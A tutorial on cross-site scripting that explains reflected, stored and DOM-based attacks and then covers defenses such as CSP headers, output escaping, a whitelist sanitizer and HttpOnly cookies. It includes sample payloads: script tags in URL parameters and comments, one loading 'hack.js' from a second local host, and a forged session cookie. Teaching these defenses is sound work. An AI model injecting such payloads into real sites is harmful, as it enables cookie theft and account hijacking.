XSS attacks and defense measures

XSS attack: Cross-site scripting attack

XSS (Cross-Site Scripting) is the most common web security vulnerability: an attacker gets HTML tags and JavaScript that the site never intended to serve injected into a vulnerable web page, and the victim's browser then runs that script with the page's origin and privileges.

XSS attack mode classification
  • Reflected: the payload is injected directly through URL parameters

    A. The attacker induces the user to click on a malicious URL, which may look like this:

    http://localhost:3000/?from=<script>alert('I am a malicious attack script!')</script>

    B. The server receives the parameter and splices the malicious code, unescaped, into the HTML it returns to the user. The user's browser executes the malicious code as soon as it parses the page.

    // ordinary
    http://localhost:3000/?from=china
    // alert to try
    http://localhost:3000/?from=
    // get a Cookie
    http://localhost:3000/?from=
    // Short domain forgery https://dwz.cn/
    // fake cookie injection in the Chrome console
    document.cookie = "kaikeba:sess=eyJ1c2VybmFtZSI6Imxhb3dhbmciLCJfZXhwaXJlIjoxNTUzNT Y1MDAxODYxLCJfbWF4QWdlIjo4NjQwMDAwMH0="
  • Stored: the malicious script is saved in the database (for example as a comment) and runs every time the stored content is rendered for a visitor

    Scenario: An attacker writes a malicious script in a comment. When other users open the comment page, the malicious script runs in their browsers and can read their information

    // comment
    <script>alert(1)</script>
    // Cross-site script injection
    I came <script src="http://localhost:4000/hack.js"></script>
  • DOM-based: URL parameter injection

    DOM-based attacks resemble reflected attacks in that the malicious script arrives through the URL, but the server is not involved: the page's own JavaScript reads the parameter and writes it into the DOM without escaping it.

XSS attack hazards
  • Read page data
  • Obtain user cookies
  • Hijack front-end logic
  • Steal arbitrary data from the website
  • Steal the user's data
  • Steal user secrets and login state
  • Deceive users (phishing)
XSS defense means
  1. X-XSS-Protection

    The HTTP X-XSS-Protection response header is a feature of Internet Explorer, Chrome, and Safari that stops the browser from loading the page when it detects a reflected cross-site scripting (XSS) attack. Configuration values:
    • 0 – Disable XSS filtering.
    • 1 – Enable XSS filtering (usually the browser default). When the browser detects an attack, it removes the unsafe part of the page.
    • 1; mode=block – Enable XSS filtering. When an attack is detected, the browser does not sanitize the page but blocks rendering entirely.
    • 1; report=<reporting-URI> (Chromium only) – Enable XSS filtering. When an attack is detected, the browser sanitizes the page and sends a violation report, using the same mechanism as the CSP report-uri directive.
    Chromium-based browsers have since removed the XSS auditor behind this header and Firefox never implemented it, so treat it as legacy defense in depth rather than a primary control.

  2. CSP content security policy

    CSP (Content Security Policy) is an additional layer of security that helps detect and mitigate certain types of attacks, including cross-site scripting (XSS) and data injection attacks. A CSP is essentially a whitelist: the developer explicitly tells the browser which external resources may be loaded and executed. We only need to configure the rules; the interception itself is implemented by the browser, which greatly reduces the impact of XSS.

    // Only local resources are allowed to be loaded
    Content-Security-Policy: default-src 'self'
    // Only HTTPS images can be loaded
    Content-Security-Policy: img-src https://*
    // No frames of any origin are allowed to be loaded
    Content-Security-Policy: child-src 'none'

    // set the header on the response (Koa-style ctx)
    ctx.set('Content-Security-Policy', "default-src 'self'")
    // External resources cannot be loaded
    http://localhost:3000/?from=
  3. Escape characters

    The blacklist

    User input can never be trusted. The most common approach is to escape both input and output, replacing quotes, angle brackets, and slashes with their HTML entities:

    function escape(str) {
      str = str.replace(/&/g, '&amp;')
      str = str.replace(/</g, '&lt;')
      str = str.replace(/>/g, '&gt;')
      str = str.replace(/"/g, '&quot;')
      str = str.replace(/'/g, '&#39;')
      str = str.replace(/`/g, '&#96;')
      str = str.replace(/\//g, '&#x2F;')
      return str
    }

    For rich text, it is obviously not possible to escape every character this way, since that would destroy the existing formatting. In this case, you need to filter the tags with a whitelist or a blacklist. A whitelist is recommended, because there are too many tags and tag attributes to enumerate in a blacklist.

    White list

    const xss = require('xss')
    let html = xss('<h1 id="title">XSS Demo</h1><script>alert("xss");</script>')
    // -> <h1>XSS Demo</h1>&lt;script&gt;alert("xss");&lt;/script&gt;
    console.log(html)
  4. HttpOnly cookie

    This is the most effective defense against XSS attacks that steal user cookies. When the web application sets a cookie with the HttpOnly attribute, client-side JavaScript cannot read it, so a malicious script injected into the page cannot exfiltrate it, and the user's cookie information is protected

    response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly")
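The reflected splice from step B and the defenses above (output escaping, a same-origin CSP, an HttpOnly cookie) combined into one runnable Node.js example; this is added here and is not code from the original post, and the function names renderUnsafe, renderSafe, fromParam and buildResponse are assumptions:

```javascript
// Added example, not from the original post: a reflected-XSS handler pair
// in plain Node.js, written as pure functions so it runs offline.

// Same mapping as the post's escape(), with the typo in &quot; corrected.
const ENTITY_MAP = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
  "'": '&#39;', '`': '&#96;', '/': '&#x2F;',
};

// One pass over the string: every character that can open or close HTML
// syntax is replaced, so the result is safe inside element content and
// inside double- or single-quoted attribute values.
function escapeHtml(str) {
  return String(str).replace(/[&<>"'`\/]/g, (ch) => ENTITY_MAP[ch]);
}

// Reads ?from= the way a Node handler would (decoded by the URL API).
function fromParam(url) {
  return new URL(url, 'http://localhost:3000').searchParams.get('from') || '';
}

// Vulnerable: the raw parameter is spliced into the HTML (step B above).
function renderUnsafe(from) {
  return `<h1>Welcome, ${from}</h1>`;
}

// Hardened: the same page, but the parameter is escaped on output.
function renderSafe(from) {
  return `<h1>Welcome, ${escapeHtml(from)}</h1>`;
}

// Checks whether a rendered page still contains an executable <script> tag,
// which is what the browser would run in the reflected case.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Full hardened response: escaped body plus the two headers the post
// recommends, a same-origin CSP and an HttpOnly session cookie.
function buildResponse(url) {
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'Content-Security-Policy': "default-src 'self'",
      'Set-Cookie': 'uid=112; Path=/; HttpOnly',
    },
    body: renderSafe(fromParam(url)),
  };
}
```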
Related material

Front-end Security Series 1: How do I Prevent XSS attacks?